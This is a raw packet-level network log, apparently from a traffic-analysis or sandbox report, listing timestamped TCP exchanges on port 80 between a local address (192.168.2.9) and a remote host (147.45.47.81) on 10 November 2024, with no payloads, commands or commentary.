                                                                                                                                                                                Nov 10, 2024 09:18:28.979744911 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.979756117 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.979773998 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.979780912 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.979787111 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.979800940 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.979815006 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.979820013 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.979831934 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.979841948 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.979854107 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.979859114 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.979861021 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.979882956 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.979902029 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.979916096 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.979928970 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.979958057 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.979964972 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.979970932 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.980005980 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.980052948 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.980063915 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.980081081 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.980083942 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.980117083 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.980144024 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.980258942 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.980268955 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.980289936 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.980302095 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.980319977 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.980346918 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.980390072 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.980559111 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.980578899 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.980592012 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.980612993 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.980658054 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.980707884 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.980725050 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.980736971 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.980748892 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.980756044 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.980762959 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.980776072 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.980778933 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.980791092 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.980802059 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.980806112 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.980845928 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.980911970 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.980923891 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.980935097 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.980973005 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.980973005 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.981009960 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.981070042 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.981082916 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.981112957 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.981131077 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.981142044 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.981158972 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.981169939 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.981182098 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.981183052 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.981200933 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.981229067 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.981663942 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:29.020908117 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:29.020946980 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:29.020957947 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:29.020968914 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:29.021023989 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:29.021076918 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:29.037857056 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:29.037879944 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:29.037890911 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:29.037909985 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:29.037920952 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:29.037935019 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:29.037945032 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:29.037947893 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:29.038002014 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:29.038167953 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:29.038180113 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:29.038199902 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:29.038212061 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:29.038233995 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:29.038233995 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:29.038739920 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:29.038749933 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:29.038760900 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:29.038779974 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:29.038793087 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:29.038798094 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:29.038805008 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:29.038825035 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:29.038840055 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:29.038845062 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:29.038850069 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:29.038889885 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:29.038889885 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:29.039961100 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:29.040000916 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:29.040019989 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:29.040035963 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:29.040047884 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:29.040061951 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:29.040091038 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:29.040091038 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:29.040097952 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:29.040106058 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:29.040111065 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:29.040122986 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:29.040154934 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:29.081603050 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:29.081618071 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:29.081638098 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:29.081648111 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:29.081666946 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:29.081698895 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:29.094048977 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:29.094075918 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:29.094089031 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:29.094105005 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:29.094171047 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:29.094171047 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:29.094361067 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:29.094415903 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:29.094427109 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:29.094449043 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:29.094460011 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:29.094511032 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:29.094680071 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:29.094692945 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:29.094706059 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:29.094736099 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:29.095729113 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:29.095743895 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:29.095756054 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:29.095768929 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:29.095783949 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:29.095793962 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:29.095801115 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:29.095819950 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:29.095833063 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:29.095838070 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:29.095845938 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:29.095877886 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:29.095889091 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:29.095889091 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:29.095892906 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:29.095940113 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:29.096091986 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:29.096103907 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:29.096115112 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:29.096157074 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:29.096271992 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:29.096311092 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:29.096327066 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:29.096338987 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:29.096391916 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:29.096754074 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:29.096803904 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:29.096817017 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:29.096852064 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:29.097116947 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:29.097152948 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:29.097165108 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:29.097168922 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:29.097208023 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:29.097213984 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:29.097220898 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:29.097232103 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:29.097261906 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:29.098229885 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:29.098280907 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:29.098292112 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:29.098321915 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:29.098325014 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:29.098340034 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:29.098350048 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:29.098356009 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:29.098438025 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:29.099186897 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:29.099200010 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:29.099289894 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:29.099371910 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:29.099384069 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:29.099410057 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:29.099423885 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:29.099426031 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:29.099509954 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:29.099864006 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:29.099870920 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:29.099884033 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:29.099890947 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:29.099956989 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:29.099960089 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:29.099967003 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:29.099998951 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:29.100120068 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:29.100142956 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:29.100172997 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:29.100207090 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:29.100255013 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:29.100255966 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:29.100275040 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:29.100289106 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:29.100301981 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:29.100326061 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:29.100351095 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:29.100485086 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:29.100532055 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:29.100548029 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:29.100593090 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:29.100616932 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:29.100635052 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:29.100677967 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:29.100734949 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:29.100774050 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:29.100781918 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:29.100786924 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:29.100831032 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:29.100835085 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:29.100848913 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:29.100863934 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:29.100888014 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:29.100888968 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:29.100908995 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:29.100920916 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:29.100923061 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:29.100933075 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:29.100945950 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:29.100961924 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:29.101005077 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:29.101268053 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:29.101283073 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:29.101296902 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:29.101345062 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:29.101357937 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:29.101357937 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:29.101435900 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:29.101475000 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:29.101494074 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:29.101506948 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:29.101527929 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:29.101566076 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:29.101573944 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:29.101577997 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:29.101605892 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:29.101624966 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:29.101629019 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:29.101640940 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:29.101651907 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:29.101670980 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:29.101685047 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:29.101691008 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:29.101691008 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:29.101697922 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:29.101726055 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:29.101778984 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:29.101790905 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:29.101809025 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:29.101845980 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:29.101845980 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:29.102003098 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:29.102015972 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:29.102027893 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:29.102061987 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:29.136790037 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:29.136820078 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:29.136835098 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:29.136859894 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:29.136872053 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:29.136883974 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:29.136892080 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:29.136912107 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:29.136924028 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:29.136935949 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:29.136949062 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:29.136964083 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:29.136970997 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:29.136979103 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:29.136991024 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:29.136993885 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:29.137005091 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:29.137017012 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:29.137037039 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:29.137044907 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:29.137052059 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:29.137068033 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:29.137092113 CET4983380192.168.2.9147.45.47.81
